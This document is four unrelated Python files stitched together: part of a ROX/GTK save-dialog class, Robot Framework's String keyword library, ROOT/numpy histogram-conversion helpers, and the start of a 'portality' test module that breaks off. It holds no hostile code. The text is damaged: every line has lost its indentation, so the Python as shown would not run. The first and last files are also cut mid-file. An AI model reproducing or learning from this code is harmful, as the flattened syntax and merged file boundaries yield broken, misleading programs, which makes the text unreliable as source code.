self.set_position(g.WIN_POS_MOUSE)
self.set_wmclass('savebox', 'Savebox')
self.set_border_width(1)
# Might as well make use of the new nested scopes ;-)
self.set_save_in_progress(0)
class BoxedArea(SaveArea):
def set_uri(area, uri):
SaveArea.set_uri(area, uri)
if discard:
document.discard()
def save_done(area):
document.save_done()
self.destroy()
def set_sensitive(area, sensitive):
if self.window:
# Might have been destroyed by now...
self.set_save_in_progress(not sensitive)
SaveArea.set_sensitive(area, sensitive)
save_area = BoxedArea(document, uri, type)
self.save_area = save_area
save_area.show_all()
self.build_main_area()
i = uri.rfind('/')
i = i + 1
# Have to do this here, or the selection gets messed up
save_area.entry.grab_focus()
g.Editable.select_region(save_area.entry, i, -1) # PyGtk bug
#save_area.entry.select_region(i, -1)
def got_response(widget, response):
if self.save_in_progress:
try:
document.save_cancelled()
except:
rox.report_exception()
return
if response == g.RESPONSE_CANCEL:
self.destroy()
elif response == g.RESPONSE_OK:
self.save_area.save_to_file_in_entry()
elif response == g.RESPONSE_DELETE_EVENT:
pass
else:
raise Exception('Unknown response!')
self.connect('response', got_response)
rox.toplevel_ref()
self.connect('destroy', lambda w: rox.toplevel_unref())
def set_type(self, type, icon = None):
"""See SaveArea's method of the same name."""
self.save_area.set_type(type, icon)
def build_main_area(self):
"""Place self.save_area somewhere in self.vbox. Override this
for more complicated layouts."""
self.vbox.add(self.save_area)
def set_save_in_progress(self, in_progress):
"""Called when saving starts and ends. Shade/unshade any widgets as
required. Make sure you call the default method too!
Not called if box is destroyed from a recursive mainloop inside
a save_to_* function."""
self.set_response_sensitive(g.RESPONSE_OK, not in_progress)
self.save_in_progress = in_progress
class StringSaver(SaveBox, Saveable):
"""A very simple SaveBox which saves the string passed to its constructor."""
def __init__(self, string, name):
"""'string' is the string to save. 'name' is the default filename"""
SaveBox.__init__(self, self, name, 'text/plain')
self.string = string
def save_to_stream(self, stream):
stream.write(self.string)
class SaveFilter(Saveable):
"""This Saveable runs a process in the background to generate the
save data. Any python streams can be used as the input to and
output from the process.
The output from the subprocess is saved to the output stream (either
directly, for fileno() streams, or via another temporary file).
If the process returns a non-zero exit status or writes to stderr,
the save fails (messages written to stderr are displayed).
"""
stdin = None
def set_stdin(self, stream):
"""Use 'stream' as stdin for the process. If stream is not a
seekable fileno() stream then it is copied to a temporary file
at this point. If None, the child process will get /dev/null on
stdin."""
if stream is not None:
if hasattr(stream, 'fileno') and hasattr(stream, 'seek'):
self.stdin = stream
else:
import tempfile
import shutil
self.stdin = tempfile.TemporaryFile()
shutil.copyfileobj(stream, self.stdin)
else:
self.stdin = None
def save_to_stream(self, stream):
from processes import PipeThroughCommand
assert not hasattr(self, 'child_run') # No longer supported
self.process = PipeThroughCommand(self.command, self.stdin, stream)
self.process.wait()
self.process = None
def save_cancelled(self):
"""Send SIGTERM to the child processes."""
if self.process:
self.killed = 1
self.process.kill()
| |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
from fnmatch import fnmatchcase
from random import randint
from string import ascii_lowercase, ascii_uppercase, digits
from robot.api import logger
from robot.utils import is_bytes, is_string, is_truthy, is_unicode, lower, unic
from robot.version import get_version
class String(object):
"""A test library for string manipulation and verification.
``String`` is Robot Framework's standard library for manipulating
strings (e.g. `Replace String Using Regexp`, `Split To Lines`) and
verifying their contents (e.g. `Should Be String`).
Following keywords from ``BuiltIn`` library can also be used with strings:
- `Catenate`
- `Get Length`
- `Length Should Be`
- `Should (Not) Be Empty`
- `Should (Not) Be Equal (As Strings/Integers/Numbers)`
- `Should (Not) Match (Regexp)`
- `Should (Not) Contain`
- `Should (Not) Start With`
- `Should (Not) End With`
- `Convert To String`
- `Convert To Bytes`
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = get_version()
def convert_to_lowercase(self, string):
"""Converts string to lowercase.
Examples:
| ${str1} = | Convert To Lowercase | ABC |
| ${str2} = | Convert To Lowercase | 1A2c3D |
| Should Be Equal | ${str1} | abc |
| Should Be Equal | ${str2} | 1a2c3d |
New in Robot Framework 2.8.6.
"""
# Custom `lower` needed due to IronPython bug. See its code and
# comments for more details.
return lower(string)
def convert_to_uppercase(self, string):
"""Converts string to uppercase.
Examples:
| ${str1} = | Convert To Uppercase | abc |
| ${str2} = | Convert To Uppercase | 1a2C3d |
| Should Be Equal | ${str1} | ABC |
| Should Be Equal | ${str2} | 1A2C3D |
New in Robot Framework 2.8.6.
"""
return string.upper()
def encode_string_to_bytes(self, string, encoding, errors='strict'):
"""Encodes the given Unicode ``string`` to bytes using the given ``encoding``.
``errors`` argument controls what to do if encoding some characters fails.
All values accepted by ``encode`` method in Python are valid, but in
practice the following values are most useful:
- ``strict``: fail if characters cannot be encoded (default)
- ``ignore``: ignore characters that cannot be encoded
- ``replace``: replace characters that cannot be encoded with
a replacement character
Examples:
| ${bytes} = | Encode String To Bytes | ${string} | UTF-8 |
| ${bytes} = | Encode String To Bytes | ${string} | ASCII | errors=ignore |
Use `Convert To Bytes` in ``BuiltIn`` if you want to create bytes based
on character or integer sequences. Use `Decode Bytes To String` if you
need to convert byte strings to Unicode strings and `Convert To String`
in ``BuiltIn`` if you need to convert arbitrary objects to Unicode.
New in Robot Framework 2.7.7.
"""
return string.encode(encoding, errors)
def decode_bytes_to_string(self, bytes, encoding, errors='strict'):
"""Decodes the given ``bytes`` to a Unicode string using the given ``encoding``.
``errors`` argument controls what to do if decoding some bytes fails.
All values accepted by ``decode`` method in Python are valid, but in
practice the following values are most useful:
- ``strict``: fail if characters cannot be decoded (default)
- ``ignore``: ignore characters that cannot be decoded
- ``replace``: replace characters that cannot be decoded with
a replacement character
Examples:
| ${string} = | Decode Bytes To String | ${bytes} | UTF-8 |
| ${string} = | Decode Bytes To String | ${bytes} | ASCII | errors=ignore |
Use `Encode String To Bytes` if you need to convert Unicode strings to
byte strings, and `Convert To String` in ``BuiltIn`` if you need to
convert arbitrary objects to Unicode strings.
New in Robot Framework 2.7.7.
"""
return bytes.decode(encoding, errors)
def get_line_count(self, string):
"""Returns and logs the number of lines in the given string."""
count = len(string.splitlines())
logger.info('%d lines' % count)
return count
def split_to_lines(self, string, start=0, end=None):
"""Splits the given string to lines.
It is possible to get only a selection of lines from ``start``
to ``end`` so that ``start`` index is inclusive and ``end`` is
exclusive. Line numbering starts from 0, and it is possible to
use negative indices to refer to lines from the end.
Lines are returned without the newlines. The number of
returned lines is automatically logged.
Examples:
| @{lines} = | Split To Lines | ${manylines} | | |
| @{ignore first} = | Split To Lines | ${manylines} | 1 | |
| @{ignore last} = | Split To Lines | ${manylines} | | -1 |
| @{5th to 10th} = | Split To Lines | ${manylines} | 4 | 10 |
| @{first two} = | Split To Lines | ${manylines} | | 1 |
| @{last two} = | Split To Lines | ${manylines} | -2 | |
Use `Get Line` if you only need to get a single line.
"""
start = self._convert_to_index(start, 'start')
end = self._convert_to_index(end, 'end')
lines = string.splitlines()[start:end]
logger.info('%d lines returned' % len(lines))
return lines
def get_line(self, string, line_number):
"""Returns the specified line from the given ``string``.
Line numbering starts from 0 and it is possible to use
negative indices to refer to lines from the end. The line is
returned without the newline character.
Examples:
| ${first} = | Get Line | ${string} | 0 |
| ${2nd last} = | Get Line | ${string} | -2 |
Use `Split To Lines` if all lines are needed.
"""
line_number = self._convert_to_integer(line_number, 'line_number')
return string.splitlines()[line_number]
def get_lines_containing_string(self, string, pattern, case_insensitive=False):
"""Returns lines of the given ``string`` that contain the ``pattern``.
The ``pattern`` is always considered to be a normal string, not a glob
or regexp pattern. A line matches if the ``pattern`` is found anywhere
on it.
The match is case-sensitive by default, but giving ``case_insensitive``
a true value makes it case-insensitive. The value is considered true
if it is a non-empty string that is not equal to ``false`` or ``no``.
If the value is not a string, its truth value is got directly in Python.
Lines are returned as one string catenated back together with
newlines. Possible trailing newline is never returned. The
number of matching lines is automatically logged.
Examples:
| ${lines} = | Get Lines Containing String | ${result} | An example |
| ${ret} = | Get Lines Containing String | ${ret} | FAIL | case-insensitive |
See `Get Lines Matching Pattern` and `Get Lines Matching Regexp`
if you need more complex pattern matching.
"""
if is_truthy(case_insensitive):
pattern = pattern.lower()
contains = lambda line: pattern in line.lower()
else:
contains = lambda line: pattern in line
return self._get_matching_lines(string, contains)
def get_lines_matching_pattern(self, string, pattern, case_insensitive=False):
"""Returns lines of the given ``string`` that match the ``pattern``.
The ``pattern`` is a _glob pattern_ where:
| ``*`` | matches everything |
| ``?`` | matches any single character |
| ``[chars]`` | matches any character inside square brackets (e.g. ``[abc]`` matches either ``a``, ``b`` or ``c``) |
| ``[!chars]`` | matches any character not inside square brackets |
A line matches only if it matches the ``pattern`` fully.
The match is case-sensitive by default, but giving ``case_insensitive``
a true value makes it case-insensitive. The value is considered true
if it is a non-empty string that is not equal to ``false`` or ``no``.
If the value is not a string, its truth value is got directly in Python.
Lines are returned as one string catenated back together with
newlines. Possible trailing newline is never returned. The
number of matching lines is automatically logged.
Examples:
| ${lines} = | Get Lines Matching Pattern | ${result} | Wild???? example |
| ${ret} = | Get Lines Matching Pattern | ${ret} | FAIL: * | case_insensitive=true |
See `Get Lines Matching Regexp` if you need more complex
patterns and `Get Lines Containing String` if searching
literal strings is enough.
"""
if is_truthy(case_insensitive):
pattern = pattern.lower()
matches = lambda line: fnmatchcase(line.lower(), pattern)
else:
matches = lambda line: fnmatchcase(line, pattern)
return self._get_matching_lines(string, matches)
def get_lines_matching_regexp(self, string, pattern, partial_match=False):
"""Returns lines of the given ``string`` that match the regexp ``pattern``.
See `BuiltIn.Should Match Regexp` for more information about
Python regular expression syntax in general and how to use it
in Robot Framework test data in particular.
By default lines match only if they match the pattern fully, but
partial matching can be enabled by giving the ``partial_match``
argument a true value. The value is considered true if it is a
non-empty string that is not equal to ``false`` or ``no``. If the
value is not a string, its truth value is got directly in Python.
If the pattern is empty, it matches only empty lines by default.
When partial matching is enabled, empty pattern matches all lines.
Notice that to make the match case-insensitive, you need to prefix
the pattern with case-insensitive flag ``(?i)``.
Lines are returned as one string concatenated back together with
newlines. Possible trailing newline is never returned. The
number of matching lines is automatically logged.
Examples:
| ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example |
| ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example | partial_match=true |
| ${ret} = | Get Lines Matching Regexp | ${ret} | (?i)FAIL: .* |
See `Get Lines Matching Pattern` and `Get Lines Containing
String` if you do not need full regular expression powers (and
complexity).
``partial_match`` argument is new in Robot Framework 2.9. In earlier
versions exact match was always required.
"""
if not is_truthy(partial_match):
pattern = '^%s$' % pattern
return self._get_matching_lines(string, re.compile(pattern).search)
def _get_matching_lines(self, string, matches):
lines = string.splitlines()
matching = [line for line in lines if matches(line)]
logger.info('%d out of %d lines matched' % (len(matching), len(lines)))
return '\n'.join(matching)
def get_regexp_matches(self, string, pattern, *groups):
"""Returns a list of all non-overlapping matches in the given string.
``string`` is the string to find matches from and ``pattern`` is the
regular expression. See `BuiltIn.Should Match Regexp` for more
information about Python regular expression syntax in general and how
to use it in Robot Framework test data in particular.
If no groups are used, the returned list contains full matches. If one
group is used, the list contains only contents of that group. If
multiple groups are used, the list contains tuples that contain
individual group contents. All groups can be given as indexes (starting
from 1) and named groups also as names.
Examples:
| ${no match} = | Get Regexp Matches | the string | xxx |
| ${matches} = | Get Regexp Matches | the string | t.. |
| ${one group} = | Get Regexp Matches | the string | t(..) | 1 |
| ${named group} = | Get Regexp Matches | the string | t(?P<name>..) | name |
| ${two groups} = | Get Regexp Matches | the string | t(.)(.) | 1 | 2 |
=>
| ${no match} = []
| ${matches} = ['the', 'tri']
| ${one group} = ['he', 'ri']
| ${named group} = ['he', 'ri']
| ${two groups} = [('h', 'e'), ('r', 'i')]
New in Robot Framework 2.9.
"""
regexp = re.compile(pattern)
groups = [self._parse_group(g) for g in groups]
return [m.group(*groups) for m in regexp.finditer(string)]
def _parse_group(self, group):
try:
return int(group)
except ValueError:
return group
def replace_string(self, string, search_for, replace_with, count=-1):
"""Replaces ``search_for`` in the given ``string`` with ``replace_with``.
``search_for`` is used as a literal string. See `Replace String
Using Regexp` if more powerful pattern matching is needed.
If you need to just remove a string see `Remove String`.
If the optional argument ``count`` is given, only that many
occurrences from left are replaced. Negative ``count`` means
that all occurrences are replaced (default behaviour) and zero
means that nothing is done.
A modified version of the string is returned and the original
string is not altered.
Examples:
| ${str} = | Replace String | Hello, world! | world | tellus |
| Should Be Equal | ${str} | Hello, tellus! | | |
| ${str} = | Replace String | Hello, world! | l | ${EMPTY} | count=1 |
| Should Be Equal | ${str} | Helo, world! | | |
"""
count = self._convert_to_integer(count, 'count')
return string.replace(search_for, replace_with, count)
def replace_string_using_regexp(self, string, pattern, replace_with, count=-1):
"""Replaces ``pattern`` in the given ``string`` with ``replace_with``.
This keyword is otherwise identical to `Replace String`, but
the ``pattern`` to search for is considered to be a regular
expression. See `BuiltIn.Should Match Regexp` for more
information about Python regular expression syntax in general
and how to use it in Robot Framework test data in particular.
If you need to just remove a string see `Remove String Using Regexp`.
Examples:
| ${str} = | Replace String Using Regexp | ${str} | 20\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d | <DATE> |
| ${str} = | Replace String Using Regexp | ${str} | (Hello|Hi) | ${EMPTY} | count=1 |
"""
count = self._convert_to_integer(count, 'count')
# re.sub handles 0 and negative counts differently than string.replace
if count == 0:
return string
return re.sub(pattern, replace_with, string, max(count, 0))
def remove_string(self, string, *removables):
"""Removes all ``removables`` from the given ``string``.
``removables`` are used as literal strings. Each removable will be
matched to a temporary string from which preceding removables have
been already removed. See second example below.
Use `Remove String Using Regexp` if more powerful pattern matching is
needed. If only a certain number of matches should be removed,
`Replace String` or `Replace String Using Regexp` can be used.
A modified version of the string is returned and the original
string is not altered.
Examples:
| ${str} = | Remove String | Robot Framework | work |
| Should Be Equal | ${str} | Robot Frame |
| ${str} = | Remove String | Robot Framework | o | bt |
| Should Be Equal | ${str} | R Framewrk |
New in Robot Framework 2.8.2.
"""
for removable in removables:
string = self.replace_string(string, removable, '')
return string
def remove_string_using_regexp(self, string, *patterns):
"""Removes ``patterns`` from the given ``string``.
This keyword is otherwise identical to `Remove String`, but
the ``patterns`` to search for are considered to be a regular
expression. See `Replace String Using Regexp` for more information
about the regular expression syntax. That keyword can also be
used if there is a need to remove only a certain number of
occurrences.
New in Robot Framework 2.8.2.
"""
for pattern in patterns:
string = self.replace_string_using_regexp(string, pattern, '')
return string
def split_string(self, string, separator=None, max_split=-1):
"""Splits the ``string`` using ``separator`` as a delimiter string.
If a ``separator`` is not given, any whitespace string is a
separator. In that case also possible consecutive whitespace
as well as leading and trailing whitespace is ignored.
Split words are returned as a list. If the optional
``max_split`` is given, at most ``max_split`` splits are done, and
the returned list will have maximum ``max_split + 1`` elements.
Examples:
| @{words} = | Split String | ${string} |
| @{words} = | Split String | ${string} | ,${SPACE} |
| ${pre} | ${post} = | Split String | ${string} | :: | 1 |
See `Split String From Right` if you want to start splitting
from right, and `Fetch From Left` and `Fetch From Right` if
you only want to get first/last part of the string.
"""
if separator == '':
separator = None
max_split = self._convert_to_integer(max_split, 'max_split')
return string.split(separator, max_split)
def split_string_from_right(self, string, separator=None, max_split=-1):
"""Splits the ``string`` using ``separator`` starting from right.
Same as `Split String`, but splitting is started from right. This has
an effect only when ``max_split`` is given.
Examples:
| ${first} | ${rest} = | Split String | ${string} | - | 1 |
| ${rest} | ${last} = | Split String From Right | ${string} | - | 1 |
"""
if separator == '':
separator = None
max_split = self._convert_to_integer(max_split, 'max_split')
return string.rsplit(separator, max_split)
def split_string_to_characters(self, string):
"""Splits the given ``string`` to characters.
Example:
| @{characters} = | Split String To Characters | ${string} |
New in Robot Framework 2.7.
"""
return list(string)
def fetch_from_left(self, string, marker):
"""Returns contents of the ``string`` before the first occurrence of ``marker``.
If the ``marker`` is not found, whole string is returned.
See also `Fetch From Right`, `Split String` and `Split String
From Right`.
"""
return string.split(marker)[0]
def fetch_from_right(self, string, marker):
"""Returns contents of the ``string`` after the last occurrence of ``marker``.
If the ``marker`` is not found, whole string is returned.
See also `Fetch From Left`, `Split String` and `Split String
From Right`.
"""
return string.split(marker)[-1]
def generate_random_string(self, length=8, chars='[LETTERS][NUMBERS]'):
"""Generates a string with a desired ``length`` from the given ``chars``.
The population sequence ``chars`` contains the characters to use
when generating the random string. It can contain any
characters, and it is possible to use special markers
explained in the table below:
| = Marker = | = Explanation = |
| ``[LOWER]`` | Lowercase ASCII characters from ``a`` to ``z``. |
| ``[UPPER]`` | Uppercase ASCII characters from ``A`` to ``Z``. |
| ``[LETTERS]`` | Lowercase and uppercase ASCII characters. |
| ``[NUMBERS]`` | Numbers from 0 to 9. |
Examples:
| ${ret} = | Generate Random String |
| ${low} = | Generate Random String | 12 | [LOWER] |
| ${bin} = | Generate Random String | 8 | 01 |
| ${hex} = | Generate Random String | 4 | [NUMBERS]abcdef |
"""
if length == '':
length = 8
length = self._convert_to_integer(length, 'length')
for name, value in [('[LOWER]', ascii_lowercase),
('[UPPER]', ascii_uppercase),
('[LETTERS]', ascii_lowercase + ascii_uppercase),
('[NUMBERS]', digits)]:
chars = chars.replace(name, value)
maxi = len(chars) - 1
return ''.join(chars[randint(0, maxi)] for _ in range(length))
def get_substring(self, string, start, end=None):
"""Returns a substring from ``start`` index to ``end`` index.
The ``start`` index is inclusive and ``end`` is exclusive.
Indexing starts from 0, and it is possible to use
negative indices to refer to characters from the end.
Examples:
| ${ignore first} = | Get Substring | ${string} | 1 | |
| ${ignore last} = | Get Substring | ${string} | | -1 |
| ${5th to 10th} = | Get Substring | ${string} | 4 | 10 |
| ${first two} = | Get Substring | ${string} | | 1 |
| ${last two} = | Get Substring | ${string} | -2 | |
"""
start = self._convert_to_index(start, 'start')
end = self._convert_to_index(end, 'end')
return string[start:end]
def should_be_string(self, item, msg=None):
"""Fails if the given ``item`` is not a string.
This keyword passes regardless is the ``item`` is a Unicode string or
a byte string. Use `Should Be Unicode String` or `Should Be Byte
String` if you want to restrict the string type.
The default error message can be overridden with the optional
``msg`` argument.
"""
if not is_string(item):
self._fail(msg, "'%s' is not a string.", item)
def should_not_be_string(self, item, msg=None):
"""Fails if the given ``item`` is a string.
The default error message can be overridden with the optional
``msg`` argument.
"""
if is_string(item):
self._fail(msg, "'%s' is a string.", item)
def should_be_unicode_string(self, item, msg=None):
"""Fails if the given ``item`` is not a Unicode string.
Use `Should Be Byte String` if you want to verify the ``item`` is a
byte string, or `Should Be String` if both Unicode and byte strings
are fine.
The default error message can be overridden with the optional
``msg`` argument.
New in Robot Framework 2.7.7.
"""
if not is_unicode(item):
self._fail(msg, "'%s' is not a Unicode string.", item)
def should_be_byte_string(self, item, msg=None):
"""Fails if the given ``item`` is not a byte string.
Use `Should Be Unicode String` if you want to verify the ``item`` is a
Unicode string, or `Should Be String` if both Unicode and byte strings
are fine.
The default error message can be overridden with the optional
``msg`` argument.
New in Robot Framework 2.7.7.
"""
if not is_bytes(item):
self._fail(msg, "'%s' is not a byte string.", item)
def should_be_lowercase(self, string, msg=None):
"""Fails if the given ``string`` is not in lowercase.
For example, ``'string'`` and ``'with specials!'`` would pass, and
``'String'``, ``''`` and ``' '`` would fail.
The default error message can be overridden with the optional
``msg`` argument.
See also `Should Be Uppercase` and `Should Be Titlecase`.
"""
if not string.islower():
self._fail(msg, "'%s' is not lowercase.", string)
def should_be_uppercase(self, string, msg=None):
"""Fails if the given ``string`` is not in uppercase.
For example, ``'STRING'`` and ``'WITH SPECIALS!'`` would pass, and
``'String'``, ``''`` and ``' '`` would fail.
The default error message can be overridden with the optional
``msg`` argument.
See also `Should Be Titlecase` and `Should Be Lowercase`.
"""
if not string.isupper():
self._fail(msg, "'%s' is not uppercase.", string)
def should_be_titlecase(self, string, msg=None):
"""Fails if given ``string`` is not title.
``string`` is a titlecased string if there is at least one
character in it, uppercase characters only follow uncased
characters and lowercase characters only cased ones.
For example, ``'This Is Title'`` would pass, and ``'Word In UPPER'``,
``'Word In lower'``, ``''`` and ``' '`` would fail.
The default error message can be overridden with the optional
``msg`` argument.
See also `Should Be Uppercase` and `Should Be Lowercase`.
"""
if not string.istitle():
self._fail(msg, "'%s' is not titlecase.", string)
def _convert_to_index(self, value, name):
if value == '':
return 0
if value is None:
return None
return self._convert_to_integer(value, name)
def _convert_to_integer(self, value, name):
try:
return int(value)
except ValueError:
raise ValueError("Cannot convert '%s' argument '%s' to an integer."
% (name, value))
def _fail(self, message, default_template, *items):
if not message:
message = default_template % tuple(unic(item) for item in items)
raise AssertionError(message)
| |
import numpy as np
import ROOT
import math
def bin_centers(arr):
"""
Get the middle values of an array of bin edges
Parameters
----------
arr: numpy.ndarray
The array of bin edges
Returns
-------
numpy.ndarray
The array of centers
"""
return (np.delete(arr,[0])-(np.ediff1d(arr)/2.0))
def hist2array(hist, include_overflow=False, copy=True, return_edges=False, return_err=False):
"""
This algorithm is Copyright (c) 2012-2017, The root_numpy developers
See disclaimer here: https://github.com/scikit-hep/root_numpy/blob/master/LICENSE
This function is an incomplete clone of root_numpy.hist2array for 1D histograms
https://github.com/scikit-hep/root_numpy/blob/master/root_numpy/_hist.py
Parameters
----------
hist: ROOT.TH1
The ROOT histogram to convert
include_overflow: bool, optional (default=False)
If true, the over and underflow bins will be part of the array
copy: bool, optional (default=True)
If true copy the underlying array to own its memory
return_edges: bool, optional (default=False)
If true, return bin edges
return_err: bool, optional (default=False)
If true, return the sqrt(sum(weights squared))
Returns
-------
numpy.ndarray
NumPy array with bin heights
list(numpy.ndarray)
A list of arrays. One for each axis' bin edges
numpy.ndarray
NumPy array of sqrt(sum(weights squared))
"""
if isinstance(hist, ROOT.TH1F):
dtype = 'f4'
elif isinstance(hist, ROOT.TH1D):
dtype = 'f8'
else:
raise TypeError('Must be ROOT.TH1F or ROOT.TH1D!')
shape = (hist.GetNbinsX() +2,)
array = np.ndarray(shape=shape, dtype=dtype, buffer=hist.GetArray())
if return_err:
error = np.sqrt(np.ndarray(shape=shape, dtype='f8',
buffer=hist.GetSumw2().GetArray()))
if return_edges:
axis_getters, simple_hist, edges = ['GetXaxis'], True, []
for idim, axis_getter in zip(range(1), axis_getters):
ax = getattr(hist, axis_getter)(*(() if simple_hist else (idim,)))
edges.append(np.empty(ax.GetNbins() + 1, dtype=np.double))
ax.GetLowEdge(edges[-1])
edges[-1][-1] = ax.GetBinUpEdge(ax.GetNbins())
if not include_overflow:
array = array[tuple([slice(1, -1) for idim in range(array.ndim)])]
if return_err:
error = error[tuple([slice(1, -1) for idim in range(error.ndim)])]
array = np.transpose(array)
if copy:
array = np.copy(array)
if return_err:
error = np.transpose(error)
if copy:
error = np.copy(error)
if return_edges and return_err:
return array, edges, error
if return_edges:
return array, edges
if return_err:
return array, error
return array
def array2hist(array, hist_name='hist_name', binning=(10,0,100), errors=None):
"""
Create a ROOT histogram from a numpy array.
Parameters
----------
array: np.ndarray
numpy array where the elements are bin heights
hist_name: str
name for ROOT histogram
binning: tuple
binning for ROOT histogram
Returns
-------
ROOT.TH1
a ROOT TH1F or TH1D (dependent on the array dtype)
"""
if array.size != binning[0]:
raise ValueError('Array size must be number of bins!')
padded = np.pad(array,(1,1),'constant')
if array.dtype == np.float32:
h = ROOT.TH1F(hist_name,hist_name,binning[0],binning[1],binning[2])
elif array.dtype == np.float64:
h = ROOT.TH1D(hist_name,hist_name,binning[0],binning[1],binning[2])
else:
raise TypeError('We can only handle np.float32 and np.float64')
h.Set(padded.size, padded)
h.SetEntries(array.size)
if errors is not None:
if errors.size != array.size:
raise ValueError('Error is not the same size as the array')
pe = np.pad(np.ascontiguousarray(errors, dtype=np.float64), (1,1), 'constant')
h.SetError(pe)
return h
def shift_overflow(hist):
"""
A function to shift the overflow bin in a ROOT
histogram into the last bin. Only supports 1D histograms.
Parameters
----------
hist: ROOT.TH1
The ROOT histogram
"""
if not isinstance(hist, ROOT.TH1):
raise TypeError('Argument must be 1D ROOT histogram!')
nb = hist.GetNbinsX()
val1, val2 = hist.GetBinContent(nb+1), hist.GetBinContent(nb)
err1, err2 = hist.GetBinError(nb+1), hist.GetBinError(nb)
hist.SetBinContent(nb, val1+val2)
hist.SetBinError(nb, math.sqrt(err1*err1 + err2*err2))
hist.SetBinContent(nb+1, 0.0)
hist.SetBinError(nb+1, 0.0)
def tree2hist(tree, hist_name, binning, var, cut, overflow=False, negatives_to_zero=False):
"""
A function to create a histogram using TTree::Draw()
Parameters
----------
tree: ROOT.TTree or ROOT.TChain
The ROOT tree or chain
hist_name: str
The name-in-memory of the histogram to be created
binning: tuple
The binning of the histogram (nbins,xmin,xmax)
var: str
The variable (branch name) in the tree to histogram
cut: str
The selection string handed to TTree::Draw
overflow: bool
Shift the overflow bin the the last real bin
negatives_to_zero:
Make negative valued bins zero.
Returns
-------
ROOT.TH1F
The ROOT histogram created
"""
if not isinstance(tree, ROOT.TTree):
raise TypeError('Must be ROOT TTree or TChain')
#ROOT.TH1.SetDefaultSumw2() hist with weights != 1 are automatically Sumw2'ed
bin_str = '('+str(binning[0])+','+str(binning[1])+','+str(binning[2])+')'
# if the tree/chain is empty, just make an empty histogram.
if tree.GetEntries() == 0:
hist = ROOT.TH1F(hist_name,hist_name,binning[0],binning[1],binning[2])
return hist
tree.Draw(var+'>>'+hist_name+bin_str, cut, 'goff')
hist = ROOT.gDirectory.Get(str(hist_name))
if overflow:
shift_overflow(hist)
if negatives_to_zero:
for idx in (np.where(hist2array(hist) < 0)[0]):
hist.SetBinContent(int(idx)+1,0.0)
return hist
def fast2full(root_file, faststr, fullstr, fast_nom, pnom, fast_nom_e, pnom_err, bins):
"""
This function does the fast to full histogram scaling. Error is
assigned using standard error propagation.. since the error is
just statistical. The new "FULL" histogram is written to the tree.
Parameters
----------
root_file: ROOT.TFile
The ROOT file for all of our histograms
faststr: str
The string label of the fast sim systematic histogram already in the output file
fullstr: str
The new string label for the "full" sim systematic histogram to be stored
fast_nom: numpy.ndarray
An array of bin heights for the fast sim nominal histogram
pnom: numpy.ndarray
The processes full sim nominal histogram bin heights
fast_nom_e: numpy.ndarray
The statistical uncertainty in each bin (fast sim nominal)
pnom_err: numpy.ndarray
The statistical uncertainty in each bin (full sim nominal)
bin: tuple
The number of bins, left edge, and right edge (nbins,xmin,xmax)
Returns
-------
ROOT.TH1
"Full Sim" ROOT histogram associated with the original fast sim histogram.
"""
fast_a, err = hist2array(root_file.Get(faststr), return_err=True)
full_a = (pnom/fast_nom)*fast_a
full_e_term = np.power(fast_a/fast_nom*pnom_err,2)
full_e_term += np.power(pnom/fast_nom*err,2)
full_e_term += np.power(pnom*fast_a/(fast_nom*fast_nom)*fast_nom_e,2)
full_h = array2hist(full_a, fullstr, bins, errors=np.sqrt(full_e_term))
return full_h
def np_selection(x, tcut):
"""
Parse a ROOT TCut style string and construct a
numpy array for selection (numpy array of bools)
Parameters
----------
x: np.array
The numpy array for the set of events
tcut: str
The ROOT style TCut. This is a limited cut
that can only interpret "&&" combinations.
Returns
-------
np.array
The selection array of bools
"""
if not isinstance(x,np.ndarray):
raise TypeError('x must be a numpy array!')
if not isinstance(tcut,str):
raise TypeError('cuts must be a string!')
cuts = tcut.split(tcut[tcut.find('&&')])
while '' in cuts:
cuts.remove('')
sel = np.array([True for _ in range(x.shape[0])])
for c in cuts:
if '==' in c:
cc = c.split('==')
sel = (sel)&(getattr(x,cc[0])==float(cc[1]))
elif '!=' in c:
cc = c.split('!=')
sel = (sel)&(getattr(x,cc[0])!=float(cc[1]))
elif '>=' in c:
cc = c.split('>=')
sel = (sel)&(getattr(x,cc[0])>=float(cc[1]))
elif '<=' in c:
cc = c.split('<=')
sel = (sel)&(getattr(x,cc[0])<=float(cc[1]))
elif '!' in c:
cc = c.split('!')
sel = (sel)&(getattr(x,cc[1])==False)
else:
sel = (sel)&(getattr(x,c)==True)
return sel
def np_hist(dataset, var, binning, selection, weight, lumi=36.1, shift_overflow=True):
"""
Create a histogram from purely numpy stored event data
Parameters
----------
dataset: numpy.ndarray (recarray)
The numpy recarray for the dataset
var: str
The variable name that we're histogramming
binning: tuple
A tuple of (nbins, xmin, xmax)
selection: np.ndarray (of bools)
A numpy array of bools for event selection
weight: str
The weight variable in the dataset to use
lumi: float
The luminosity to scale to
shift_overflow: bool
Bring the overflow into the last real bin.
Returns
-------
numpy.ndarray
The bin heights
numpy.ndarray
The bin edges
numpy.ndarray
The statistical error in each bin
"""
x = getattr(dataset,var)[selection]
w = getattr(dataset,weight)[selection]*lumi
bins = np.linspace(binning[1],binning[2],binning[0]+1)
ofbs = np.array([binning[2],1.0e6],dtype=np.float32)
h, bins = np.histogram(x,bins=bins,weights=w)
of, trh = np.histogram(x,bins=ofbs,weights=w)
h[-1] += of[0]
digitized = np.digitize(x,bins)
digiti_of = np.digitize(x,ofbs)
bin_sumw2 = np.zeros(binning[0],dtype=w.dtype)
for i in range(1,binning[0]+1):
bin_sumw2[i-1] = sum(np.power(w[np.where(digitized==i)[0]],2))
bin_sumw2[-1] += sum(np.power(w[np.where(digiti_of==1)[0]],2))
err = np.sqrt(bin_sumw2)
return h, bins, err
| |
from flask_login import login_user
from unittest import TestCase
from portality import core, dao
from portality.app import app
from portality.tasks.redis_huey import main_queue, long_running
import dictdiffer
from datetime import datetime
from glob import glob
import os, csv, shutil
from portality.lib import paths
import functools
def patch_config(inst, properties):
originals = {}
